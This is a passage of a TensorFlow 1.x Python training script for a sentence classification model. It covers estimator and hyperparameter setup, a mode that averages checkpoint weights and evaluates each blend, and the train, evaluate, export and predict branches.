eval_throttle_secs=FLAGS.eval_throttle_secs,\n steps=FLAGS.steps,\n 
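# NOTE: eval_steps == -1 is normalized to None in main(), so evaluation then\n # runs until input_fn raises end-of-input (a full pass over the eval set).\n 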
eval_steps=FLAGS.eval_steps,\n dataset_buffer=FLAGS.dataset_buffer, # 256 MB\n dataset_parallel_reads=FLAGS.dataset_parallel_reads, # 1\n shuffle_buffer=FLAGS.shuffle_buffer, # 16 * 1024 examples\n repeat_count=FLAGS.repeat_count, # -1 = Repeat the input indefinitely.\n batch_size=FLAGS.batch_size,\n predict_batch_size=FLAGS.predict_batch_size,\n max_batch_size=FLAGS.max_batch_size,\n prefetch_buffer=FLAGS.prefetch_buffer, # batches\n dense_catagorical_fields=FLAGS.dense_catagorical_fields, # [None]\n conv_catagorical_fields=FLAGS.conv_catagorical_fields, # [0,1,2,3,4]\n sent_conv_catagorical_fields=FLAGS.\n sent_conv_catagorical_fields, # [0,1,2,3,4]\n segment_id_input=FLAGS.segment_id_input, # [None]\n # hub_model=FLAGS.hub_model, #\n init_checkpoint_root=FLAGS.init_checkpoint_root, # \n ckpt_name=FLAGS.ckpt_name, # \n title_init_checkpoint_root=FLAGS.title_init_checkpoint_root, # \n title_ckpt_name=FLAGS.title_ckpt_name, # \n title_dense_units=FLAGS.title_dense_units, # 64\n authors_embed_dim=FLAGS.authors_embed_dim, # 64\n authors_rnn_units=FLAGS.authors_rnn_units, # 64\n categories_embed_dim=FLAGS.categories_embed_dim, # 256\n categories_rnn_units=FLAGS.categories_rnn_units, # 256\n fields_embed_dim=FLAGS.fields_embed_dim, # 16\n fields_rnn_units=FLAGS.fields_rnn_units, # 16\n input_norm=FLAGS.input_norm, # 16\n rnn_norm=FLAGS.rnn_norm, # 16\n dense_norm=FLAGS.dense_norm, # 16\n embed_dim=FLAGS.embed_dim, # 32\n use_xlnet_zero_seg_ids=FLAGS.use_xlnet_zero_seg_ids, # 0.1\n xlnet_dropout=FLAGS.xlnet_dropout, # 0.1\n embedded_dropout=FLAGS.embedded_dropout, # 0.2\n feature_dropout=FLAGS.feature_dropout, # 0.2\n conv_bank_size=FLAGS.conv_bank_size, # 32\n conv_filters=FLAGS.conv_filters, # 32\n conv_kernel_size=FLAGS.conv_kernel_size, # 7\n conv_strides=FLAGS.conv_strides, # 1\n conv_dropout=FLAGS.conv_dropout, # 0.2\n use_conv_batch_norm=FLAGS.use_conv_batch_norm,\n use_conv_residual=FLAGS.use_conv_residual,\n use_rnn_residual=FLAGS.use_rnn_residual,\n use_dense_residual=FLAGS.use_dense_residual,\n use_conv_highway=FLAGS.use_conv_highway,\n conv_highway_depth=FLAGS.conv_highway_depth,\n conv_highway_units=FLAGS.conv_highway_units,\n rnn_cell_type=FLAGS.rnn_cell_type,\n rnn_num_units=FLAGS.rnn_num_units, # list\n rnn_dropout=FLAGS.rnn_dropout,\n rnn_recurrent_dropout=FLAGS.rnn_recurrent_dropout,\n dense_units=FLAGS.dense_units,\n dense_dropout=FLAGS.dense_dropout,\n attend_to=FLAGS.attend_to, # 12\n word_num_layers=FLAGS.word_num_layers, # 12\n word_d_model=FLAGS.word_d_model, # 768\n word_dff_x=FLAGS.word_dff_x, # 4\n word_dropout_rate=FLAGS.word_dropout_rate, # 0.1\n sent_num_layers=FLAGS.sent_num_layers, # 12\n sent_d_model=FLAGS.sent_d_model, # 768\n sent_dff_x=FLAGS.sent_dff_x, # 4\n sent_dropout_rate=FLAGS.sent_dropout_rate, # 0.1\n use_transformer_positional_encoding=FLAGS.\n use_transformer_positional_encoding, # 3072\n sent_pool_abstract_features=FLAGS.sent_pool_abstract_features,\n sent_conv_bank_size=FLAGS.sent_conv_bank_size,\n sent_rnn_cell_type=FLAGS.sent_rnn_cell_type,\n sent_rnn_num_units=FLAGS.sent_rnn_num_units,\n sent_dense_units=FLAGS.sent_dense_units,\n arti_dense_units=FLAGS.arti_dense_units,\n use_crf=FLAGS.use_crf, # True\n use_batch_renorm=FLAGS.use_batch_renorm,\n loss_type=FLAGS.loss_type,\n scale_label=FLAGS.scale_label,\n loss_pos_weight=FLAGS.loss_pos_weight,\n article_loss_pos_weight=FLAGS.article_loss_pos_weight,\n num_classes=FLAGS.num_classes,\n clip_gradients_std_factor=FLAGS.clip_gradients_std_factor, # 2.\n 
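# NOTE: the clip_gradients_* knobs are consumed by adaptive_clipping_fn() in\n # model_fn's optimizer scope; its result is currently not wired into\n # optimize_loss (the clip_gradients=... argument there is commented out).\n 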
clip_gradients_decay=FLAGS.clip_gradients_decay, # 0.95\n # 6.\n clip_gradients_static_max_norm=FLAGS.clip_gradients_static_max_norm,\n no_bert_training_steps=FLAGS.no_bert_training_steps, # 224\n learning_rate_decay_fn=FLAGS.learning_rate_decay_fn,\n learning_rate_decay_steps=FLAGS.learning_rate_decay_steps, # 2000\n learning_rate_decay_rate=FLAGS.learning_rate_decay_rate, # 0.7\n train_seg_embed=FLAGS.train_seg_embed, # False\n freeze_layers=FLAGS.freeze_layers, # 12\n layer_decay_rate=FLAGS.layer_decay_rate, # 1.0\n layer_warmup_steps=FLAGS.layer_warmup_steps, # 2000\n learning_rate=FLAGS.learning_rate, # 0.001\n warmup_steps=FLAGS.warmup_steps, # 35000 (10% epoch)\n warmup_repeat_steps=FLAGS.warmup_repeat_steps, # 0\n warmup_start_lr=FLAGS.warmup_start_lr, # 0.001\n warmup_schedule=FLAGS.warmup_schedule, # exp\n optimizer=FLAGS.optimizer,\n adam_epsilon=FLAGS.adam_epsilon,\n check_nans=FLAGS.check_nans,\n trace=FLAGS.trace,\n debug=FLAGS.debug,\n metadata=FLAGS.metadata\n )\n\n # hook = tf_debug.LocalCLIDebugHook()\n\n estimator = tf.estimator.Estimator(\n model_fn=model_fn, config=run_config, params=model_params\n )\n\n # save model_params to model_dir/hparams.json\n hparams_path = Path(\n estimator.model_dir,\n 'hparams-{:%Y-%m-%d-%H-%M-%S}.json'.format(datetime.datetime.now())\n )\n hparams_path.parent.mkdir(parents=True, exist_ok=True) # pylint: disable=no-member\n hparams_path.write_text(model_params.to_json(indent=2, sort_keys=False))\n\n train_spec = tf.estimator.TrainSpec(\n input_fn=input_fn,\n # A function that provides input data for training as minibatches.\n # max_steps=FLAGS.steps or None, # 0\n max_steps=None,\n # Positive number of total steps for which to train model. If None, train forever.\n hooks=None\n # passed into estimator.train(hooks)\n # and then into _train_with_estimator_spec(hooks)\n # Iterable of `tf.train.SessionRunHook` objects to run\n # on all workers (including chief) during training.\n # CheckpointSaverHook? Not here, need only to run on cchief, put in\n # estimator_spec.training_chief_hooks\n )\n\n eval_spec = tf.estimator.EvalSpec(\n input_fn=input_fn,\n # A function that constructs the input data for evaluation.\n steps=FLAGS.eval_steps, # 10\n # Positive number of steps for which to evaluate model. If\n # `None`, evaluates until `input_fn` raises an end-of-input exception.\n name=None,\n # Name of the evaluation if user needs to run multiple\n # evaluations on different data sets. Metrics for different evaluations\n # are saved in separate folders, and appear separately in tensorboard.\n hooks=None,\n # Iterable of `tf.train.SessionRunHook` objects to run\n # during evaluation.\n exporters=None,\n # Iterable of `Exporter`s, or a single one, or `None`.\n # `exporters` will be invoked after each evaluation.\n start_delay_secs=10,\n # start_delay_secs=FLAGS.eval_delay_secs, # 30 * 24 * 60 * 60\n # used for distributed training continuous evaluator only\n # Int. Start evaluating after waiting for this many seconds.\n throttle_secs=10\n # throttle_secs=FLAGS.eval_throttle_secs # 30 * 24 * 60 * 60\n # full dataset at batch=4 currently needs 15 days\n # adds a StopAtSecsHook(eval_spec.throttle_secs)\n # Do not re-evaluate unless the last evaluation was\n # started at least this many seconds ago. 
Of course, evaluation does not\n # occur if no new checkpoints are available, hence, this is the minimum.\n )\n\n return estimator, train_spec, eval_spec\n\n\ndef main(unused_args):\n # setup colored logger\n coloredlogs.DEFAULT_FIELD_STYLES = dict(\n asctime=dict(color='green'),\n hostname=dict(color='magenta', bold=True),\n levelname=dict(color='black', bold=True),\n programname=dict(color='cyan', bold=True),\n name=dict(color='blue')\n )\n coloredlogs.DEFAULT_LEVEL_STYLES = dict(\n spam=dict(color='green', faint=True),\n debug=dict(color='green'),\n verbose=dict(color='blue'),\n info=dict(),\n notice=dict(color='magenta'),\n warning=dict(color='yellow'),\n success=dict(color='green', bold=True),\n error=dict(color='red'),\n critical=dict(color='red', bold=True)\n )\n\n if tfversion[0] == 1 and tfversion[1] <= 11:\n logger = tf_logging._get_logger() # 1.11\n else:\n # >>> logging.getLogger().handlers\n # [<ABSLHandler (NOTSET)>]\n # >>> logger = tf.get_logger()\n # >>> logger.handlers\n # []\n logger = tf.get_logger() # 1.12 # pylint: disable=no-member\n if len(logging.getLogger().handlers) != 0:\n # Remove ABSLHandler\n logging.getLogger().handlers.pop()\n if len(logger.handlers) == 0:\n # Add our own handler\n _handler = logging.StreamHandler(sys.stderr)\n _handler.setFormatter(logging.Formatter(logging.BASIC_FORMAT, None))\n logger.addHandler(_handler)\n\n # print(Fore.RED + 'some red text' + Style.RESET_ALL, file=logger.handlers[0].stream)\n\n # set logger.handler.stream to output to our TqdmFile\n for h in logger.handlers:\n # <StreamHandler <stderr> (NOTSET)>\n # <StandardErrorHandler <stderr> (DEBUG)>\n # print(h)\n h.acquire()\n try:\n h.flush()\n orig_stdout = h.stream\n h.stream = TqdmFile(file=h.stream)\n finally:\n h.release()\n\n tf.logging.set_verbosity(tf.logging.DEBUG)\n tf.logging.debug('DEBUG==========test==========DEBUG')\n\n # check tfrecords data exists\n if FLAGS.job == 'train' and len(glob.glob(FLAGS.training_data)) == 0:\n msg = 'No training data files found for pattern: {}'.format(\n FLAGS.training_data\n )\n tf.logging.fatal(msg)\n raise IOError(msg)\n if FLAGS.job in {'eval', 'train'} and len(glob.glob(FLAGS.eval_data)) == 0:\n msg = 'No evaluation data files found for pattern: {}'.format(\n FLAGS.eval_data\n )\n tf.logging.fatal(msg)\n raise IOError(msg)\n if FLAGS.job == 'predict' and len(glob.glob(FLAGS.predict_data)) == 0:\n msg = 'No predict data files found for pattern: {}'.format(\n FLAGS.predict_data\n )\n tf.logging.fatal(msg)\n raise IOError(msg)\n if len(glob.glob(FLAGS.metadata_path)) == 0:\n msg = 'No metadata file found for pattern: {}'.format(\n FLAGS.metadata_path\n )\n tf.logging.fatal(msg)\n raise IOError(msg)\n\n # parse metadata\n FLAGS.metadata = None\n with open(FLAGS.metadata_path) as f:\n FLAGS.metadata = json.load(f)\n\n # read num_classes from metadata\n if not FLAGS.num_classes or FLAGS.num_classes < 1:\n # 35 for seq2seq, 33 for multilabel\n FLAGS.num_classes = len(FLAGS.metadata['task1_categories'])\n\n # set predict_top_k to num_classes if the given value doesn't make sense\n if not FLAGS.predict_top_k or FLAGS.predict_top_k < 1 or FLAGS.predict_top_k > FLAGS.num_classes:\n FLAGS.predict_top_k = FLAGS.num_classes\n\n # Hardware info\n FLAGS.num_gpus = FLAGS.num_gpus or tf.contrib.eager.num_gpus()\n FLAGS.num_cpu_threads = FLAGS.num_cpu_threads or os.cpu_count()\n\n # multi gpu distribution strategy\n distribution = None\n if FLAGS.num_gpus > 1:\n distribution = tf.contrib.distribute.MirroredStrategy(\n num_gpus=FLAGS.num_gpus\n )\n 
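# NOTE: tf.contrib.distribute.MirroredStrategy (TF1-era API) replicates the\n # model onto each visible GPU and all-reduces gradients across replicas.\n 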
tf.logging.info('MirroredStrategy num_gpus: {}'.format(FLAGS.num_gpus))\n\n if FLAGS.eval_steps == -1:\n FLAGS.eval_steps = None\n\n # Set the seeds\n if FLAGS.random_seed == -1:\n FLAGS.random_seed = None\n else:\n np.random.seed(FLAGS.random_seed)\n if tfversion[0] == 1 and tfversion[1] <= 13:\n tf.set_random_seed(FLAGS.random_seed)\n else:\n tf.random.set_random_seed(FLAGS.random_seed)\n\n # Use JIT XLA\n # session_config = tf.ConfigProto(log_device_placement=True)\n session_config = tf.ConfigProto(allow_soft_placement=True)\n # default session config when init Estimator\n session_config.graph_options.rewrite_options.meta_optimizer_iterations = rewriter_config_pb2.RewriterConfig.ONE # pylint: disable=no-member\n if FLAGS.use_xla:\n session_config.graph_options.optimizer_options.global_jit_level = tf.OptimizerOptions.ON_1 # pylint: disable=no-member\n # session_config.graph_options.rewrite_options.memory_optimization = rewriter_config_pb2.RewriterConfig.NO_MEM_OPT\n\n if FLAGS.job == 'crossover':\n checkpoints = [c.strip() for c in FLAGS.crossover_checkpoints.split(',')]\n checkpoints = [c for c in checkpoints if c]\n num_chk = len(checkpoints)\n assert num_chk > 1, f'Provide 2 or more checkpoints to --crossover_checkpoints, {checkpoints}'\n crossover_meta = {\n 'checkpoints': checkpoints,\n 'best_threshold_f1': {}\n }\n var_shapes = tf.train.list_variables(checkpoints[0])\n var_dtypes = {}\n var_values = defaultdict(list)\n global_steps = []\n for checkpoint in checkpoints:\n tf.logging.info(\"Read from checkpoint %s\", checkpoint)\n reader = tf.train.load_checkpoint(checkpoint)\n with tqdm(\n total=len(var_shapes),\n unit='vars',\n dynamic_ncols=True,\n ascii=True,\n smoothing=0.1,\n desc='read'\n ) as t:\n for (name, _) in var_shapes:\n t.update()\n if reader.has_tensor(name):\n tensor = reader.get_tensor(name)\n if name == 'global_step':\n global_steps.append(tensor)\n else:\n var_dtypes[name] = tensor.dtype\n var_values[name].append(tensor)\n del var_shapes\n # build crossover values\n print(f'build crossover weights: {len(var_values)}')\n crossover_weights = defaultdict(dict)\n with tqdm(\n total=len(var_values),\n unit='vars',\n dynamic_ncols=True,\n ascii=True,\n smoothing=0.1,\n desc='weights'\n ) as t:\n for name, values in var_values.items():\n t.update()\n if num_chk == 2:\n w = FLAGS.crossover_weights\n for i in np.arange(w[0], w[1], w[2]):\n j = 100 - i\n crossover_weights[f'{j:05.2f}-{i:05.2f}'] = [j,i]\n elif num_chk == 3:\n # [[1, 1, 8], [1, 2, 7], [1, 3, 6], [1, 1, 1]]\n i = 939.9\n j = 60.1\n for k in np.arange(250, 110, -10):\n crossover_weights[f'{i/10:05.2f}-{j/10:05.2f}-{k/10:05.2f}'] = [i,j,k]\n else:\n crossover_weights['avg'] = None\n # crossover_values = defaultdict(dict)\n # with tqdm(\n # total=len(var_values),\n # unit='vars',\n # dynamic_ncols=True,\n # ascii=True,\n # smoothing=0.1,\n # desc='build'\n # ) as t:\n # for name, values in var_values.items():\n # t.update()\n # # crossover_values['min'][name] = np.min(values, axis=0)\n # # crossover_values['max'][name] = np.max(values, axis=0)\n # if num_chk == 2:\n # w = FLAGS.crossover_weights\n # for i in np.arange(w[0], w[1], w[2]):\n # j = 100 - i\n # if name[:9] == 'optimizer':\n # v = np.average(values, axis=0)\n # else:\n # v = np.average(values, axis=0, weights=[j,i])\n # crossover_values[f'{j:.2f}-{i:.2f}'][name] = v\n # elif num_chk == 3:\n # # [[1, 1, 8], [1, 2, 7], [1, 3, 6], [1, 1, 1]]\n # i = 939.9\n # j = 60.1\n # for k in np.arange(250, 110, -10):\n # if name[:9] == 'optimizer':\n # v = 
np.average(values, axis=0)\n # else:\n # v = np.average(values, axis=0, weights=[i,j,k])\n # crossover_values[f'{i/10:.2f}-{j/10:.2f}-{k/10:.2f}'][name] = v\n # # w = FLAGS.crossover_weights\n # # for w in FLAGS.crossover_weights:\n # # for weights in sorted(set(list(itertools.permutations(w))), reverse=True):\n # # if name[:9] == 'optimizer':\n # # v = np.average(values, axis=0)\n # # else:\n # # v = np.average(values, axis=0, weights=weights)\n # # crossover_values['-'.join([str(s) for s in weights])][name] = v\n # else:\n # crossover_values['avg'][name] = np.average(values, axis=0)\n \n # prep variables\n print('prep variables')\n with tf.variable_scope(tf.get_variable_scope(), reuse=tf.AUTO_REUSE):\n tf_vars = [\n tf.get_variable(name, shape=var_values[name][0].shape, dtype=var_dtypes[name])\n for name in var_values\n ]\n del var_dtypes\n placeholders = [tf.placeholder(v.dtype, shape=v.shape) for v in tf_vars]\n assign_ops = [tf.assign(v, p) for (v, p) in zip(tf_vars, placeholders)]\n global_step = tf.Variable(max(global_steps), name=\"global_step\", trainable=False, dtype=tf.int64)\n saver = tf.train.Saver(tf.all_variables(), max_to_keep=9999)\n \n # save crossover checkpoint and evaluate\n print('save crossover checkpoint and evaluate')\n crossover_output_prefix = verify_output_path(FLAGS.crossover_output_prefix)\n # for method, values in crossover_values.items():\n for method, weights in crossover_weights.items():\n crossover_values = {}\n with tqdm(\n total=len(var_values),\n unit='vars',\n dynamic_ncols=True,\n ascii=True,\n smoothing=0.1,\n desc=f'build-{method}'\n ) as t:\n for name, values in var_values.items():\n t.update()\n if name[:9] == 'optimizer':\n v = np.average(values, axis=0)\n else:\n v = np.average(values, axis=0, weights=weights)\n crossover_values[name] = v\n print(f'=== saving {method} ===')\n crossover_checkpoint = verify_output_path(crossover_output_prefix / method / method)\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n for p, assign_op, value in zip(placeholders, assign_ops, crossover_values.values()):\n sess.run(assign_op, {p: value})\n # Use the built saver to save the averaged checkpoint.\n saver.save(sess, str(crossover_checkpoint))\n del crossover_values\n # evaluate\n model_dir = str(crossover_checkpoint.parent)\n print(f'=== evaluate {method}: {model_dir} ===')\n estimator, train_spec, eval_spec = create_estimator_and_specs(\n run_config=tf.estimator.RunConfig(\n model_dir=model_dir,\n tf_random_seed=FLAGS.random_seed,\n save_summary_steps=None,\n save_checkpoints_steps=None,\n save_checkpoints_secs=None,\n keep_checkpoint_max=9999,\n log_step_count_steps=None,\n session_config=session_config\n )\n )\n eval_result_metrics = estimator.evaluate(\n input_fn=eval_spec.input_fn,\n steps=None,\n hooks=eval_spec.hooks,\n checkpoint_path=str(crossover_checkpoint),\n name=f'evaluate-{method}'\n )\n # calculate best threshold\n precision = np.array(\n eval_result_metrics['precision_recall_at_equal_thresholds'][4]\n )\n recall = np.array(\n eval_result_metrics['precision_recall_at_equal_thresholds'][5]\n )\n thresholds = np.array(\n eval_result_metrics['precision_recall_at_equal_thresholds'][6]\n )\n eval_result_metrics['best_threshold_f1'] = max(\n zip(thresholds, 2 * precision * recall / (precision + recall)),\n key=lambda x: x[1]\n )\n print(f\"=== best_threshold_f1 ({method}): ({eval_result_metrics['best_threshold_f1'][0]:.3f}, {eval_result_metrics['best_threshold_f1'][1]:.8f})\")\n crossover_meta['best_threshold_f1'][method] = 
eval_result_metrics['best_threshold_f1']\n crossover_output_temp = crossover_output_prefix / f'{crossover_output_prefix.name}-crossover-meta-progress.json'\n with crossover_output_temp.open(encoding='utf-8', mode='w') as f: # pylint: disable=no-member\n json.dump(\n crossover_meta,\n f,\n indent=2,\n sort_keys=False,\n cls=NumpyEncoder\n )\n \n # save results\n print('save results')\n crossover_output = crossover_output_prefix / f'{crossover_output_prefix.name}-crossover-meta.json'\n with crossover_output.open(encoding='utf-8', mode='a') as f: # pylint: disable=no-member\n json.dump(\n crossover_meta,\n f,\n indent=2,\n sort_keys=False,\n cls=NumpyEncoder\n )\n return\n \n epoch_checkpoint_re = re.compile(r'.*epoch-(\\d+)-\\d+$')\n while True:\n # figure out the model dir to use\n model_dir = FLAGS.model_dir\n if FLAGS.job == 'train':\n if FLAGS.model_dir:\n assert FLAGS.max_runs <= 1, f\"set --model_dir_prefix instead of --model_dir for multiple runs\"\n else:\n assert FLAGS.model_dir_prefix, f\"set either --model_dir_prefix or --model_dir\"\n run_i = 1\n while run_i <= FLAGS.max_runs or FLAGS.max_runs == -1:\n epoch_i = 0\n model_dir = FLAGS.model_dir or f\"{FLAGS.model_dir_prefix}-{run_i:05d}\"\n latest_checkpoint = tf.train.latest_checkpoint(model_dir, latest_filename='epoch.latest')\n if not latest_checkpoint:\n break # got fresh run\n # parse epoch_i, error out if unparsable\n epoch_i = int(epoch_checkpoint_re.match(latest_checkpoint).group(1))\n if epoch_i < FLAGS.max_epochs or FLAGS.max_epochs == -1:\n break # got partial run\n run_i += 1\n if FLAGS.model_dir:\n tf.logging.info(f\"Finished 1 run of {FLAGS.max_epochs} epochs!\")\n return\n else:\n tf.logging.info(f\"Finished all {FLAGS.max_runs} runs of {FLAGS.max_epochs} epochs!\")\n return\n assert model_dir, f\"empty model_dir\"\n # Parse experiment_name and host_script_name if needed\n # Example: --model_dir=${MODELDIR}/Attention_lr0.5_ws35000_${CARDTYPE}_${HOSTSCRIPT}.${NUMGPU}\n # experiment_name = Attention\n # host_script_name = ${HOSTSCRIPT}.${NUMGPU}\n model_dir_parts = Path(model_dir).name.split('_')\n if len(model_dir_parts) > 1:\n if FLAGS.experiment_name == 'PARSE': # Default: Exp\n FLAGS.experiment_name = model_dir_parts[0]\n if FLAGS.host_script_name == 'PARSE': # Default: tensorflow\n FLAGS.host_script_name = model_dir_parts[-1]\n # '\\x1b[32m%(asctime)s,%(msecs)03d\\x1b[0m \\x1b[1;35m%(hostname)s\\x1b[0m \\x1b[34m%(name)s[%(process)d]\\x1b[0m \\x1b[1;30m%(levelname)s\\x1b[0m %(message)s'\n coloredlogs.DEFAULT_LOG_FORMAT = f'\\x1b[32m%(asctime)s,%(msecs)03d\\x1b[0m \\x1b[1;35m{FLAGS.experiment_name}\\x1b[0m \\x1b[34m{FLAGS.host_script_name}[%(process)d]\\x1b[0m \\x1b[1;30m%(levelname)s\\x1b[0m %(message)s'\n coloredlogs.install(\n level='DEBUG',\n logger=logger,\n milliseconds=True,\n stream=logger.handlers[0].stream\n )\n\n estimator, train_spec, eval_spec = create_estimator_and_specs(\n run_config=tf.estimator.RunConfig(\n train_distribute=distribution,\n model_dir=model_dir,\n # Directory to save model parameters, graph and etc. This can\n # also be used to load checkpoints from the directory into a estimator to\n # continue training a previously saved model. If `PathLike` object, the\n # path will be resolved. If `None`, the model_dir in `config` will be used\n # if set. If both are set, they must be same. 
If both are `None`, a\n # temporary directory will be used.\n tf_random_seed=FLAGS.random_seed, # 33\n # Random seed for TensorFlow initializers.\n # Setting this value allows consistency between reruns.\n save_summary_steps=FLAGS.save_summary_steps, # 10\n # if not None, a SummarySaverHook will be added in MonitoredTrainingSession()\n # The frequency, in number of global steps, that the\n # summaries are written to disk using a default SummarySaverHook. If both\n # `save_summaries_steps` and `save_summaries_secs` are set to `None`, then\n # the default summary saver isn't used. Default 100.\n save_checkpoints_steps=None, # 100\n # Save checkpoints every this many steps.\n # save_checkpoints_secs=None,\n # We will define our own CheckpointSaverHook in EstimatorSpec.training_chief_hooks\n save_checkpoints_secs=FLAGS.save_checkpoints_secs, # 10m\n # if not None, a CheckpointSaverHook will be added in MonitoredTrainingSession()\n # Save checkpoints every this many seconds with\n # CheckpointSaverHook. Can not be specified with `save_checkpoints_steps`.\n # Defaults to 600 seconds if both `save_checkpoints_steps` and\n # `save_checkpoints_secs` are not set in constructor.\n # If both `save_checkpoints_steps` and `save_checkpoints_secs` are None,\n # then checkpoints are disabled.\n keep_checkpoint_max=FLAGS.keep_checkpoint_max, # 5\n # Maximum number of checkpoints to keep. As new checkpoints\n # are created, old ones are deleted. If None or 0, no checkpoints are\n # deleted from the filesystem but only the last one is kept in the\n # `checkpoint` file. Presently the number is only roughly enforced. For\n # example in case of restarts more than max_to_keep checkpoints may be\n # kept.\n keep_checkpoint_every_n_hours=FLAGS.keep_checkpoint_every_n_hours, # 6\n # keep an additional checkpoint\n # every `N` hours. For example, if `N` is 0.5, an additional checkpoint is\n # kept for every 0.5 hours of training, this is in addition to the\n # keep_checkpoint_max checkpoints.\n # Defaults to 10,000 hours.\n log_step_count_steps=None, # Customized LoggingTensorHook defined in model_fn\n # if not None, a StepCounterHook will be added in MonitoredTrainingSession()\n # log_step_count_steps=FLAGS.log_step_count_steps, # 10\n # The frequency, in number of global steps, that the\n # global step/sec will be logged during training.\n session_config=session_config\n )\n )\n\n if FLAGS.job == 'eval':\n if not FLAGS.eval_predict_checkpoint:\n FLAGS.eval_predict_checkpoint = tf.train.latest_checkpoint(\n model_dir\n )\n tf.logging.info(\n 'Evaluating checkpoint: %s', FLAGS.eval_predict_checkpoint\n )\n eval_result_metrics = estimator.evaluate(\n input_fn=eval_spec.input_fn,\n steps=\n None, # Number of steps for which to evaluate model. 
If None, evaluates until input_fn raises an end-of-input exception.\n hooks=eval_spec.hooks,\n checkpoint_path=FLAGS.eval_predict_checkpoint,\n name='evaluate'\n )\n # calculate best threshold\n global_step = eval_result_metrics['global_step']\n precision = np.array(\n eval_result_metrics['precision_recall_at_equal_thresholds'][4]\n )\n recall = np.array(\n eval_result_metrics['precision_recall_at_equal_thresholds'][5]\n )\n thresholds = np.array(\n eval_result_metrics['precision_recall_at_equal_thresholds'][6]\n )\n eval_result_metrics['best_threshold'] = max(\n zip(thresholds, 2 * precision * recall / (precision + recall)),\n key=lambda x: x[1]\n )\n print('best_threshold:', eval_result_metrics['best_threshold'])\n # precision_article = np.array(\n # eval_result_metrics['precision_recall_at_equal_thresholds_article'][4]\n # )\n # recall_article = np.array(\n # eval_result_metrics['precision_recall_at_equal_thresholds_article'][5]\n # )\n # thresholds_article = np.array(\n # eval_result_metrics['precision_recall_at_equal_thresholds_article'][6]\n # )\n # eval_result_metrics['best_threshold_article'] = max(\n # zip(thresholds_article, 2 * precision_article * recall_article / (precision_article + recall_article)),\n # key=lambda x: x[1]\n # )\n # print('best_threshold_article:', eval_result_metrics['best_threshold_article'])\n # # save eval results\n # if not FLAGS.eval_dir:\n # FLAGS.eval_dir = str(\n # Path(model_dir) / 'eval-{}'.format(global_step)\n # )\n # if not FLAGS.eval_prefix:\n # FLAGS.eval_prefix = '{}@{}'.format(\n # Path(model_dir).name, global_step\n # )\n # output_path = Path(FLAGS.eval_dir\n # ) / '{}-metrics.{}'.format(FLAGS.eval_prefix, 'json')\n # # assert dirs\n # output_path.parent.mkdir(parents=True, exist_ok=True) # pylint: disable=no-member\n # with output_path.open(encoding='utf-8', mode='a') as f: # pylint: disable=no-member\n # json.dump(\n # eval_result_metrics,\n # f,\n # indent=2,\n # sort_keys=False,\n # cls=NumpyEncoder\n # )\n elif FLAGS.job == 'export':\n if not FLAGS.export_checkpoint:\n FLAGS.export_checkpoint = tf.train.latest_checkpoint(\n model_dir\n )\n if not FLAGS.export_dir:\n FLAGS.export_dir = str(Path(model_dir) / 'export')\n tf.logging.info('Exporting checkpoint: %s', FLAGS.export_checkpoint)\n export_dir = estimator.export_saved_model(\n export_dir_base=FLAGS.export_dir,\n # serving_input_receiver_fn=serving_input_dataset_receiver_fn,\n serving_input_receiver_fn=serving_input_str_receiver_fn,\n assets_extra=None,\n as_text=False,\n checkpoint_path=FLAGS.export_checkpoint\n )\n tf.logging.info('Checkpoint exported to: %s', export_dir)\n # signature_def['serving_default']:\n # The given SavedModel SignatureDef contains the following input(s):\n # inputs['protein_sequences'] tensor_info:\n # dtype: DT_STRING\n # shape: (-1)\n # name: input_protein_string_tensor:0\n # The given SavedModel SignatureDef contains the following output(s):\n # outputs['classes'] tensor_info:\n # dtype: DT_INT32\n # shape: (-1, -1)\n # name: predictions/ArgMax:0\n # outputs['top_classes'] tensor_info:\n # dtype: DT_INT32\n # shape: (-1, -1, 3)\n # name: predictions/TopKV2:1\n # outputs['top_probs'] tensor_info:\n # dtype: DT_FLOAT\n # shape: (-1, -1, 3)\n # name: predictions/TopKV2:0\n # Method name is: tensorflow/serving/predict\n elif FLAGS.job == 'predict':\n if not FLAGS.eval_predict_checkpoint:\n FLAGS.eval_predict_checkpoint = tf.train.latest_checkpoint(\n model_dir\n )\n tf.logging.info('Loading checkpoint: %s', FLAGS.eval_predict_checkpoint)\n predictions = 
estimator.predict(\n input_fn=input_fn,\n # predict_keys=[\n # 'predicted_sentence_classes', 'predicted_sentence_class_scores',\n # 'predicted_article_classes', 'predicted_article_class_scores'\n # ],\n predict_keys=[\n 'predicted_sentence_classes', 'predicted_sentence_class_scores'\n ],\n hooks=None,\n checkpoint_path=FLAGS.eval_predict_checkpoint,\n # yield_single_examples=True\n yield_single_examples=False\n )\n sentence_pred_list = []\n sentence_scores_list = []\n # article_pred_list = []\n # article_scores_list = []\n total = math.ceil(20000 / FLAGS.predict_batch_size)\n with tqdm(\n # total=131166,\n # unit='sentences',\n total=total,\n unit='batches',\n # total=FLAGS.metadata['test']['articles'],\n # unit='articles',\n dynamic_ncols=True,\n ascii=True,\n smoothing=0.1,\n desc='predictions'\n ) as t:\n for i, p in enumerate(predictions):\n t.update()\n # print(i, p)\n # pred_list.append(p)\n # sentence_pred_list.append(p['predicted_sentence_classes'].tolist())\n # sentence_scores_list.append(\n # p['predicted_sentence_class_scores'].tolist()\n # )\n # article_pred_list.append(p['predicted_article_classes'].tolist())\n # article_scores_list.append(\n # p['predicted_article_class_scores'].tolist()\n # )\n # if i > 10:\n # break\n sentence_pred_list += p['predicted_sentence_classes'].tolist()\n sentence_scores_list += p['predicted_sentence_class_scores'].tolist()\n # article_pred_list += p['predicted_article_classes'].tolist()\n # article_scores_list += p['predicted_article_class_scores'].tolist()\n # print(pred_list)\n # save predictions\n print('save predictions')\n output_path = Path(\n FLAGS.eval_predict_checkpoint + FLAGS.predict_prefix +\n '-predict-sentence.json'\n )\n with output_path.open(encoding='utf-8', mode='w') as f: # pylint: disable=no-member\n json.dump(sentence_pred_list, f, indent=2, sort_keys=False, cls=NumpyEncoder)\n # output_path = Path(\n # FLAGS.eval_predict_checkpoint + FLAGS.article_predict_prefix +\n # '-predict-article.json'\n # )\n # with output_path.open(encoding='utf-8', mode='w') as f: # pylint: disable=no-member\n # json.dump(article_pred_list, f, indent=2, sort_keys=False, cls=NumpyEncoder)\n \n # save predictions\n print('save scores')\n output_path = Path(\n FLAGS.eval_predict_checkpoint + FLAGS.predict_prefix +\n '-scores-sentence.json'\n )\n with output_path.open(encoding='utf-8', mode='w') as f: # pylint: disable=no-member\n json.dump(\n sentence_scores_list, f, indent=2, sort_keys=False, cls=NumpyEncoder\n )\n # output_path = Path(\n # 